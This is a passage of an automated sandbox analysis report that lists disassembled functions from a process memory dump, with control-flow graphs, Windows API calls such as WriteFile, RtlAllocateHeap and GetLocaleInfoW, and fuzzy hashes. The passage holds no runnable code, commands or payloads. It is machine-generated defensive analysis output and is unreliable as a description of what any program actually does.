                                                                                                                                                                                                                                                                • Instruction ID: a20e516cb6cae4faa6fadfd2449bea0bb9716dc07962e03462675f9676428fb2
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8969c6317cd71645401bd306019cd2c92d263eec6b1c3b1635951d44a48f8a15
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A231F73550C3804BD717AB34A8D97EBBBD4ABBE318F19097DD8C9C7243D2A15449CB62

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 109 345283-3452a5 110 345498 109->110 111 3452ab-3452ad 109->111 112 34549a-34549e 110->112 113 3452af-3452ce call 33b601 111->113 114 3452d9-3452fc 111->114 122 3452d1-3452d4 113->122 116 345302-345308 114->116 117 3452fe-345300 114->117 116->113 118 34530a-34531b 116->118 117->116 117->118 120 34531d-34532b call 344033 118->120 121 34532e-34533e call 3455b0 118->121 120->121 127 345387-345399 121->127 128 345340-345346 121->128 122->112 129 3453f0-345410 WriteFile 127->129 130 34539b-3453a1 127->130 131 34536f-345385 call 34562d 128->131 132 345348-34534b 128->132 133 345412-345418 GetLastError 129->133 134 34541b 129->134 136 3453a3-3453a6 130->136 137 3453dc-3453e9 call 345a5c 130->137 147 345368-34536a 131->147 138 345356-345365 call 3459f4 132->138 139 34534d-345350 132->139 133->134 141 34541e-345429 134->141 142 3453c8-3453da call 345c20 136->142 143 3453a8-3453ab 136->143 154 3453ee 137->154 138->147 139->138 144 345430-345433 139->144 148 345493-345496 141->148 149 34542b-34542e 141->149 159 3453c3-3453c6 142->159 150 345436-345438 143->150 151 3453b1-3453be call 345b37 143->151 144->150 147->141 148->112 149->144 155 345466-345472 150->155 156 34543a-34543f 150->156 151->159 154->159 162 345474-34547a 155->162 163 34547c-34548e 155->163 160 345441-345453 156->160 161 345458-345461 call 33adf9 156->161 159->147 160->122 161->122 162->110 162->163 163->122
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 0034562D: GetConsoleOutputCP.KERNEL32(825BC0CB,00000000,00000000,?), ref: 00345690
                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,0033BBF3,?), ref: 00345408
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,0033BBF3,?,0033BE37,00000000,?,00000000,0033BE37,?,?,?,00354628,0000002C,0033BD23,?), ref: 00345412
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ConsoleErrorFileLastOutputWrite
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2915228174-0
                                                                                                                                                                                                                                                                • Opcode ID: 6eaac6eef9bf3e0d6a43b7e043a64072236a8488058d3c8b53f34d3deb028213
                                                                                                                                                                                                                                                                • Instruction ID: b425f770c57ea15cc8c785de58480ca5333aba2ab9030a9348f4cc8388a1f866
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6eaac6eef9bf3e0d6a43b7e043a64072236a8488058d3c8b53f34d3deb028213
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1361B176D04619AFDF12CFA8C885AAEBBF9AF19344F150155E900AF253D371E941CB60

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 166 345a5c-345ab1 call 3356e0 169 345b26-345b36 call 3329c6 166->169 170 345ab3 166->170 172 345ab9 170->172 174 345abf-345ac1 172->174 175 345ac3-345ac8 174->175 176 345adb-345b00 WriteFile 174->176 177 345ad1-345ad9 175->177 178 345aca-345ad0 175->178 179 345b02-345b0d 176->179 180 345b1e-345b24 GetLastError 176->180 177->174 177->176 178->177 179->169 181 345b0f-345b1a 179->181 180->169 181->172 182 345b1c 181->182 182->169
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,?,?,003453EE,00000000,0033BE37,?,00000000,?,00000000), ref: 00345AF8
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,003453EE,00000000,0033BE37,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,0033BBF3), ref: 00345B1E
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 442123175-0
                                                                                                                                                                                                                                                                • Opcode ID: 1bb8fb876138a9fbe6887e42b017c6125c3f0af6ee7237c65e55481670e3a48e
                                                                                                                                                                                                                                                                • Instruction ID: 5ec0b693b44d2a14f4bf159997a9140242ba40b545918be79f38149479799583
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1bb8fb876138a9fbe6887e42b017c6125c3f0af6ee7237c65e55481670e3a48e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 51216031A106199BCB16CF29DD809E9B7F9EB48341F2441A9E906DB222D630AE46CB60

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 183 33ff89-33ff8e 184 33ff90-33ffa8 183->184 185 33ffb6-33ffbf 184->185 186 33ffaa-33ffae 184->186 188 33ffd1 185->188 189 33ffc1-33ffc4 185->189 186->185 187 33ffb0-33ffb4 186->187 191 34002b-34002f 187->191 190 33ffd3-33ffe0 GetStdHandle 188->190 192 33ffc6-33ffcb 189->192 193 33ffcd-33ffcf 189->193 194 33ffe2-33ffe4 190->194 195 34000d-34001f 190->195 191->184 196 340035-340038 191->196 192->190 193->190 194->195 197 33ffe6-33ffef GetFileType 194->197 195->191 198 340021-340024 195->198 197->195 199 33fff1-33fffa 197->199 198->191 200 340002-340005 199->200 201 33fffc-340000 199->201 200->191 202 340007-34000b 200->202 201->191 202->191
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,?,00000000,0033FE78,00354948), ref: 0033FFD5
                                                                                                                                                                                                                                                                • GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,0033FE78,00354948), ref: 0033FFE7
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FileHandleType
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3000768030-0
                                                                                                                                                                                                                                                                • Opcode ID: 0a78751cd5d96a68b32b5cc203955ee8f139f4c5d7e33e47adca687d7f3c8292
                                                                                                                                                                                                                                                                • Instruction ID: aec471fa251d6558ccaf18e8e5f64e1c4a83bd6dc6f8f0a13dbab0800c06ff30
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0a78751cd5d96a68b32b5cc203955ee8f139f4c5d7e33e47adca687d7f3c8292
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4211B471A047114AC7364A3D9CC8722BAD8AB52330F79072ED6B68B5F1C230ED42D240

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 203 33136e-3313b1 call 33ce80 call 33197e 208 3313b7-3313fa 203->208 209 3314c9-3314ce 203->209 210 33144e-331463 call 33408b 208->210 211 3313fc-331404 208->211 212 3314f0-331532 call 331ab6 call 331a10 call 3329c6 209->212 217 331466-33147b 210->217 211->210 213 331406-331409 211->213 215 33140d-331425 call 3319d8 213->215 226 3314d0-3314d5 215->226 227 33142b-331442 215->227 220 3314c0-3314c7 217->220 221 33147d-331485 217->221 222 3314e0-3314ec 220->222 221->220 225 331487-331489 221->225 222->212 229 33148a-3314a5 call 3319d8 225->229 226->222 227->215 231 331444-33144c 227->231 234 3314d7-3314dc 229->234 235 3314a7-3314be 229->235 231->210 234->222 235->220 235->229
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _strlen
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 4218353326-0
                                                                                                                                                                                                                                                                • Opcode ID: 060ccb874e7e6bafe4785d2fc8f319bc7647c00100f7dd6dd05024e457e61d68
                                                                                                                                                                                                                                                                • Instruction ID: 924c8ddf7c316b29a4ca9bc97e1f79f146c0c495a90516997c4f4d619146d218
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 060ccb874e7e6bafe4785d2fc8f319bc7647c00100f7dd6dd05024e457e61d68
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C6518D313042049FCB15DF6DC9D4B6AB7E6EF88728F198668E969CB392D630ED05CB41

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 237 333c29-333c43 238 333c45-333c47 237->238 239 333c4c-333c54 237->239 240 333d25-333d32 call 3329c6 238->240 241 333c56-333c60 239->241 242 333c75-333c79 239->242 241->242 250 333c62-333c73 241->250 243 333d21 242->243 244 333c7f-333c90 call 3344b9 242->244 248 333d24 243->248 253 333c92-333c96 244->253 254 333c98-333ccc 244->254 248->240 251 333cee-333cf0 250->251 251->248 255 333cdf call 3335da 253->255 260 333cf2-333cfa 254->260 261 333cce-333cd1 254->261 258 333ce4-333ceb 255->258 258->251 262 333d0f-333d1f 260->262 263 333cfc-333d0d call 33c578 260->263 261->260 264 333cd3-333cd7 261->264 262->248 263->243 263->262 264->243 266 333cd9-333cdc 264->266 266->255
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 08f37a4e1003a141cf6198bda276776455e959de4de73b44f1158f5983e13869
                                                                                                                                                                                                                                                                • Instruction ID: 54173b05368fad4d4e145b891d55833f7ed59498ffc34c21c6866d9d9f01746d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 08f37a4e1003a141cf6198bda276776455e959de4de73b44f1158f5983e13869
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FD31757290411AAFCF16CF68D8D09EDB7B9BF09320F145265E512E7690D731FA44CB50

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 268 333c1b-333c20 269 333c22-333c28 call 338773 268->269 270 333c6e-333c74 268->270 272 333c76 270->272 273 333bf9-333c08 270->273 275 333cc4-333ccc 272->275 276 333c78-333c80 272->276 278 333cf2-333cfa 275->278 279 333cce-333cd1 275->279 276->275 280 333d0f-333d1f 278->280 281 333cfc-333d0d call 33c578 278->281 279->278 282 333cd3-333cd7 279->282 284 333d24-333d32 call 3329c6 280->284 281->280 285 333d21 281->285 282->285 286 333cd9-333cdf call 3335da 282->286 285->284 293 333ce4-333cf0 286->293 293->284
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CriticalLeaveSection
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3988221542-0
                                                                                                                                                                                                                                                                • Opcode ID: b52e2684ac0e283bd877b36c6823ca39183f6ca29c6b8373dd65ee2deb198e34
                                                                                                                                                                                                                                                                • Instruction ID: 730a1c066b0a16d259a7ed42df459f4980e2938bce36d7745b647a94b0afeb4d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b52e2684ac0e283bd877b36c6823ca39183f6ca29c6b8373dd65ee2deb198e34
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B601F43660C2565ACB179B78E9E52ACBB60FF86334F24D26FE102D95D1CB125A51C310

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 295 33e531-33e53d 296 33e56f-33e57a call 33ad6d 295->296 297 33e53f-33e541 295->297 304 33e57c-33e57e 296->304 299 33e543-33e544 297->299 300 33e55a-33e56b RtlAllocateHeap 297->300 299->300 301 33e546-33e54d call 33b92d 300->301 302 33e56d 300->302 301->296 307 33e54f-33e558 call 338f08 301->307 302->304 307->296 307->300
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,003331E1,0033186A,?,003360C1,0033186C,0033186A,?,?,?,00333181,003331E1,0033186E,0033186A,0033186A,0033186A), ref: 0033E563
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                • Opcode ID: 9f0fcadb5ef6c118dbecdda61951eefe726e4dd4cc31addf8ca5fb0830e239a7
                                                                                                                                                                                                                                                                • Instruction ID: 0ff7a067724b89832ced5ed84f6f1fe77baa7627dac0e4506f02f551d13a79d2
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9f0fcadb5ef6c118dbecdda61951eefe726e4dd4cc31addf8ca5fb0830e239a7
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DEE0223190122457FB336B66AC81B5A3A4C9F037B8F160120FC56EB4E1FB60CD0082B0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(?,2000000B,00342B49,00000002,00000000,?,?,?,00342B49,?,00000000), ref: 00343211
                                                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(?,20001004,00342B49,00000002,00000000,?,?,?,00342B49,?,00000000), ref: 0034323A
                                                                                                                                                                                                                                                                • GetACP.KERNEL32(?,?,00342B49,?,00000000), ref: 0034324F
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InfoLocale
                                                                                                                                                                                                                                                                • String ID: ACP$OCP
                                                                                                                                                                                                                                                                • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                                                • Opcode ID: c5034cfbdf489bf156c41301e0609095c73704408f639f8ef9b79c4acc5cef57
                                                                                                                                                                                                                                                                • Instruction ID: 8aeb6df0ff504761a8a55181b15ebaa4dc90fc8ebeef7be550dec4e94857a289
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c5034cfbdf489bf156c41301e0609095c73704408f639f8ef9b79c4acc5cef57
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8421AC32600105AADB379F64D805BAB73EAAF94B50B278824E90ADF120E772FF40D750
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 0033E783: GetLastError.KERNEL32(00000000,?,00340AB9), ref: 0033E787
                                                                                                                                                                                                                                                                  • Part of subcall function 0033E783: SetLastError.KERNEL32(00000000,?,?,00000028,0033B9D2), ref: 0033E829
                                                                                                                                                                                                                                                                • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 00342B1B
                                                                                                                                                                                                                                                                • IsValidCodePage.KERNEL32(00000000), ref: 00342B59
                                                                                                                                                                                                                                                                • IsValidLocale.KERNEL32(?,00000001), ref: 00342B6C
                                                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00342BB4
                                                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00342BCF
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 415426439-0
                                                                                                                                                                                                                                                                • Opcode ID: 0ba8731b10de7eea0d1bae6cf8951a36560ff47ce7be8fb64aa9ac9f06f0eff5
                                                                                                                                                                                                                                                                • Instruction ID: c094710c0944b4c8c9d8e9a3f819a19409c888755eeb19e69a3870340a802e1a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0ba8731b10de7eea0d1bae6cf8951a36560ff47ce7be8fb64aa9ac9f06f0eff5
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DD514F71A00215AEDB22DFA4CC85AAF77F8FF14701F964469B901FF191DB70AA44CB61
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0034384A
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
